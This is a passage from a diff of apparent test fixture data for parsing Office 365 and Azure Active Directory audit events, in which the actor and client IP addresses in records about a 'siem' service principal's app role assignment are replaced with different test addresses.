Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -11388,9 +11388,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:45",
 "ExtendedProperties": [
 {
@@ -11624,7 +11624,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -11654,9 +11654,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:45",
 "ExtendedProperties": [
 {
@@ -11890,7 +11890,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 